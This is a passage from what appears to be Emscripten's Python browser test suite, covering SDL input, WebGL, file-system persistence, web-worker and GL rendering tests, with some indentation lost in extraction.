0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
    open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
    self.run_browser('page.html', '', '/report_result?740')
def test_sdl_mouse_offsets(self):
    """SDL mouse coordinates when the canvas is offset inside the page: a
    custom page.html positions the canvas at a 5px offset, and (unlike
    test_sdl_mouse) simulateMouseEvent dispatches raw page coordinates
    without adding the canvas offset. The page reports 600 on success."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
    # Hand-written page: the #container div offsets the canvas by 5px in both
    # axes so the mouse coordinate translation is actually exercised.
    open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
    open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js']).communicate()
    self.run_browser('page.html', '', '/report_result?600')
def test_glut_touchevents(self):
    """GLUT touch-event handling; the page reports 1 on success."""
    src = 'glut_touchevents.c'
    self.btest(src, '1')
def test_glut_wheelevents(self):
    """GLUT wheel-event handling; the page reports 1 on success."""
    src = 'glut_wheelevents.c'
    self.btest(src, '1')
def test_sdl_joystick_1(self):
    """SDL joystick against the 2012 Working Draft Gamepad API, where button
    states are plain numbers. The pre-js spoofs navigator.getGamepads and
    exposes helpers to add gamepads and simulate button/axis changes; the
    page reports 2 on success."""
    # Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
    # http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
    open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
    self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
    """SDL joystick against the Editor's Draft Gamepad API, where buttons are
    objects with {pressed, value} fields (mutated in place, as Firefox does).
    Same spoofing approach as test_sdl_joystick_1; the page reports 2."""
    # Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
    # https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
    open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
    self.run_browser('page.html', '', '/report_result?2')
def test_webgl_context_attributes(self):
    """WebGL context attributes (antialias, depth, stencil) under GLUT, SDL
    and GLFW, with the attributes both requested and not requested. A JS
    library probes what the browser's WebGL implementation supports so the
    tests also succeed when an attribute is unavailable."""
    # Javascript code to check the attributes support we want to test in the WebGL implementation
    # (request the attribute, create a context and check its value afterwards in the context attributes).
    # Tests will succeed when an attribute is not supported.
    open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
}
});
''')
    # Copy common code file to temporary directory
    filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
    temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
    shutil.copyfile(filepath, temp_filepath)
    # perform tests with attributes activated
    self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
    self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
    self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
    # perform tests with attributes desactivated
    self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
    self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
    self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
def test_emscripten_get_now(self):
    """emscripten_get_now() sanity check; the page reports 1 on success."""
    src = 'emscripten_get_now.cpp'
    self.btest(src, '1')
def test_fflush(self):
    """Disabled test: the early return skips the btest below on purpose."""
    return self.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
    # Unreachable while the skip above is in place; kept so the test can be
    # re-enabled by deleting the return.
    self.btest('test_fflush.cpp', '0', args=['-s', 'NO_EXIT_RUNTIME=1', '--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
    """File persistence via file_db.cpp: the first run preloads moar.txt
    (containing a time-based secret) and stores it (-DFIRST, reports 1);
    the second run has no preload and must report the stored secret; the
    third run preloads a different file but the stored secret still wins."""
    secret = str(time.time())
    open('moar.txt', 'w').write(secret)
    self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
    shutil.copyfile('test.html', 'first.html')
    self.btest('file_db.cpp', secret)
    shutil.copyfile('test.html', 'second.html')
    open('moar.txt', 'w').write('aliantha')
    self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
    shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
    """IDBFS persistence: the first btest (with -DFIRST) stores a time-based
    secret; the second, without -DFIRST, must read it back. Runs in both the
    default MEMFS mode and MEMFS_APPEND_TO_TYPED_ARRAYS mode."""
    for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
        secret = str(time.time())
        self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
        self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
def test_force_exit(self):
    """force_exit.c (compiled as C) must report 17."""
    self.btest('force_exit.c', expected='17', force_c=True)
def test_sdl_pumpevents(self):
    """Key events must be observable via SDL_PumpEvents; a pre-js provides a
    keydown() helper that synthesizes DOM KeyboardEvents. Reports 7."""
    # key events should be detected using SDL_PumpEvents
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
    self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js'])
def test_sdl_canvas_size(self):
    """Canvas sizing behavior with a custom shell file."""
    shell = path_from_root('tests', 'sdl_canvas_size.html')
    self.btest('sdl_canvas_size.c', expected='1',
               args=['-O2', '--minify', '0', '--shell-file', shell])
def test_sdl_gl_read(self):
    # SDL, OpenGL, readPixels
    src = os.path.join(self.get_dir(), 'sdl_gl_read.c')
    payload = self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read())
    open(src, 'w').write(payload)
    Popen([PYTHON, EMCC, src, '-o', 'something.html']).communicate()
    self.run_browser('something.html', '.', '/report_result?1')
def test_sdl_gl_mapbuffers(self):
    """Buffer mapping under -s FULL_ES3=1; expects a blue triangle."""
    self.btest('sdl_gl_mapbuffers.c', expected='1',
               message='You should see a blue triangle.',
               args=['-s', 'FULL_ES3=1'])
def test_sdl_ogl(self):
    """SDL + legacy GL emulation rendering of a preloaded texture, at -O2."""
    dest = os.path.join(self.get_dir(), 'screenshot.png')
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), dest)
    self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
               message='You should see an image with gray at the top.',
               args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])
def test_sdl_ogl_defaultmatrixmode(self):
    """Default-matrix-mode variant of the SDL + legacy GL texture test."""
    dest = os.path.join(self.get_dir(), 'screenshot.png')
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), dest)
    self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
               message='You should see an image with gray at the top.',
               args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])
def test_sdl_ogl_p(self):
    # Immediate mode with pointers
    dest = os.path.join(self.get_dir(), 'screenshot.png')
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), dest)
    self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
               message='You should see an image with gray at the top.',
               args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2'])
def test_egl(self):
    """EGL context-creation smoke test compiled to an HTML page."""
    src_path = os.path.join(self.get_dir(), 'test_egl.c')
    # Context managers guarantee the instrumented source is flushed and
    # closed before EMCC compiles it.
    with open(path_from_root('tests', 'test_egl.c')) as src:
        instrumented = self.with_report_result(src.read())
    with open(src_path, 'w') as out:
        out.write(instrumented)
    Popen([PYTHON, EMCC, '-O2', src_path, '-o', 'page.html']).communicate()
    self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
    """EGL surface width/height query; the canvas default size is (300, 150)."""
    src_path = os.path.join(self.get_dir(), 'test_egl_width_height.c')
    # Context managers guarantee the instrumented source is flushed and
    # closed before EMCC compiles it.
    with open(path_from_root('tests', 'test_egl_width_height.c')) as src:
        instrumented = self.with_report_result(src.read())
    with open(src_path, 'w') as out:
        out.write(instrumented)
    Popen([PYTHON, EMCC, '-O2', src_path, '-o', 'page.html']).communicate()
    self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_worker(self):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''')
html_file.close()
# no file data
for file_data in [0, 1]:
print 'file data', file_data
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) , stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('worker.js'), output
if not file_data: self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_chunked_synchronous_xhr(self):
    """Chunked synchronous XHR in a web worker, verified by an adler32 checksum.

    Builds a checksummer worker whose pre-js lazily maps a remote file into
    the FS, serves random data from a helper server process, and checks the
    checksum the worker reports matches the one computed locally.
    """
    main = 'chunked_sync_xhr.html'
    worker_filename = "download_and_checksum_worker.js"
    # Driver page: stdout messages from the worker carry the result;
    # stderr messages are logged (line- or char-at-a-time) for debugging.
    html_file = open(main, 'w')
    html_file.write(r"""
      <!doctype html>
      <html>
      <head><meta charset="utf-8"><title>Chunked XHR</title></head>
      <html>
      <body>
        Chunked XHR Web Worker Test
        <script>
          var worker = new Worker(""" + json.dumps(worker_filename) + r""");
          var buffer = [];
          worker.onmessage = function(event) {
            if (event.data.channel === "stdout") {
              var xhr = new XMLHttpRequest();
              xhr.open('GET', 'http://localhost:8888/report_result?' + event.data.line);
              xhr.send();
              setTimeout(function() { window.close() }, 1000);
            } else {
              if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
              if (event.data.line) {
                console.error(event.data.line);
              } else {
                var v = event.data.char;
                if (v == 10) {
                  var line = buffer.splice(0);
                  console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
                } else {
                  buffer.push(v);
                }
              }
            }
          };
        </script>
      </body>
      </html>
    """)
    html_file.close()
    c_source_filename = "checksummer.c"
    prejs_filename = "worker_prejs.js"
    # Pre-js: lazily map the served file at /bigfile and forward the
    # program's stdout/stderr through postMessage to the driver page.
    prejs_file = open(prejs_filename, 'w')
    prejs_file.write(r"""
      if (typeof(Module) === "undefined") Module = {};
      Module["arguments"] = ["/bigfile"];
      Module["preInit"] = function() {
          FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
      };
      var doTrace = true;
      Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
      Module["stderr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
    """)
    prejs_file.close()
    # vs. os.path.join(self.get_dir(), filename)
    # vs. path_from_root('tests', 'hello_world_gles.c')
    Popen([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_CHUNKS=1', '-o', worker_filename,
           '--pre-js', prejs_filename]).communicate()
    chunkSize = 1024
    data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
    checksum = zlib.adler32(data)
    # Serve the random data from a separate process so the worker can fetch it.
    server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True,chunkSize,data,checksum,))
    server.start()
    self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
    server.terminate()
    # Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
    # attempt to rmdir() files in use.
    if WINDOWS:
        time.sleep(2)
def test_glgears(self):
    """GLES gears demo compared against the gears reference image."""
    self.btest('hello_world_gles.c', reference='gears.png', reference_slack=2,
               args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
               message='You should see animating gears.')

def test_glgears_long(self):
    """Long-running gears demo, with and without --proxy-to-worker."""
    for proxy in [0, 1]:
        print 'proxy', proxy
        self.btest('hello_world_gles.c', expected=map(str, range(30, 500)), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST'] + (['--proxy-to-worker'] if proxy else []))

def test_glgears_animation(self):
    """Gears animation with the GL_TESTING shell, across three ES2 source variants."""
    es2_suffix = ['', '_full', '_full_944']
    for full_es2 in [0, 1, 2]:
        print full_es2
        Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
               '-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1',
               '--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
              (['-s', 'FULL_ES2=1'] if full_es2 else []),
              ).communicate()
        self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')

def test_fulles2_sdlproc(self):
    """FULL_ES2 build that resolves GL entry points via SDL proc addresses."""
    self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1'])

def test_glgears_deriv(self):
    """Gears variant using shader derivatives; output must not pull in gl-matrix."""
    self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
               args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
               message='You should see animating gears.')
    with open('something.html') as f:
        assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
def test_glbook(self):
    """Build and render the OpenGL ES book sample chapters against reference images.

    Samples that load textures get their .tga assets copied in and preloaded;
    the ParticleSystem sample additionally exercises -O2.
    """
    programs = self.get_library('glbook', [
        os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
        os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
        os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
        os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
        os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
        os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
        os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
    ], configure=None)
    def book_path(*pathelems):
        # Helper: path under tests/glbook.
        return path_from_root('tests', 'glbook', *pathelems)
    for program in programs:
        print program
        basename = os.path.basename(program)
        args = []
        if basename == 'CH10_MultiTexture.bc':
            shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
            shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
            args = ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
        elif basename == 'CH13_ParticleSystem.bc':
            shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
            args = ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
        self.btest(program,
                   reference=book_path(basename.replace('.bc', '.png')), args=args)
def test_gles2_emulation(self):
    """Compile GL ES book samples from source under FULL_ES2 and compare to references.

    Samples needing WebGL extensions not available at the time are commented out.
    """
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
    for source, reference in [
        (os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
        #(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
        (os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
        #(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
        (os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
        (os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
        (os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
    ]:
        print source
        # Each sample is built together with the shared esUtil helpers.
        self.btest(source,
                   reference=reference,
                   args=['-I' + path_from_root('tests', 'glbook', 'Common'),
                         path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
                         path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
                         path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
                         path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
                         '-s', 'FULL_ES2=1',
                         '--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
    """emscripten.h browser APIs; _third must stay exported alongside _main."""
    self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']'''])
def test_emscripten_api2(self):
    """File-packager output consumed at runtime, also when the data file lives in a subdirectory."""
    def setup():
        # script1.js is loaded by the test at runtime; file1/file2 get packaged.
        with open('script1.js', 'w') as f:
            f.write('''
      Module._set(456);
    ''')
        with open('file1.txt', 'w') as f:
            f.write('first')
        with open('file2.txt', 'w') as f:
            f.write('second')
    setup()
    # 'with' guarantees script2.js is flushed before btest loads it.
    with open('script2.js', 'w') as script2:
        Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=script2).communicate()
    self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']'''])
    # check using file packager to another dir
    self.clear()
    setup()
    os.mkdir('sub')
    with open('script2.js', 'w') as script2:
        Popen([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=script2).communicate()
    shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
    self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']'''])
def test_emscripten_api_infloop(self):
    """emscripten API use from an infinite main loop."""
    self.btest('emscripten_api_browser_infloop.cpp', '7')

def test_emscripten_fs_api(self):
    """Browser FS API; the screenshot is preloaded *after* run starts."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
    self.btest('emscripten_fs_api_browser.cpp', '1')

def test_emscripten_main_loop(self):
    """emscripten_set_main_loop basic behavior."""
    self.btest('emscripten_main_loop.cpp', '0')

def test_sdl_quit(self):
    """SDL_Quit handling."""
    self.btest('sdl_quit.c', '1')

def test_sdl_resize(self):
    """SDL window/canvas resize handling."""
    self.btest('sdl_resize.c', '1')

def test_glshaderinfo(self):
    """glGetShaderInfoLog and related shader introspection."""
    self.btest('glshaderinfo.cpp', '1')

def test_glgetattachedshaders(self):
    """glGetAttachedShaders query."""
    self.btest('glgetattachedshaders.c', '1')
def test_sdlglshader(self):
    """SDL + GL shaders under legacy emulation, optimized with closure."""
    self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])

def test_sdlglshader2(self):
    """Second shader test; also run proxied to a worker."""
    self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)

def test_gl_glteximage(self):
    """glTexImage2D edge cases."""
    self.btest('gl_teximage.c', '1')

def test_gl_textures(self):
    """GL texture creation/binding."""
    self.btest('gl_textures.cpp', '0')

def test_gl_ps(self):
    """Client-side pointers plus a shader, with a preloaded texture."""
    # pointers and a shader
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)

def test_gl_ps_packed(self):
    """Packed vertex data that the emulation must stride out."""
    # packed data that needs to be strided
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)

def test_gl_ps_strides(self):
    """Vertex data with explicit strides."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])

def test_gl_renderers(self):
    """Multiple GL renderer paths with unsafe optimizations disabled."""
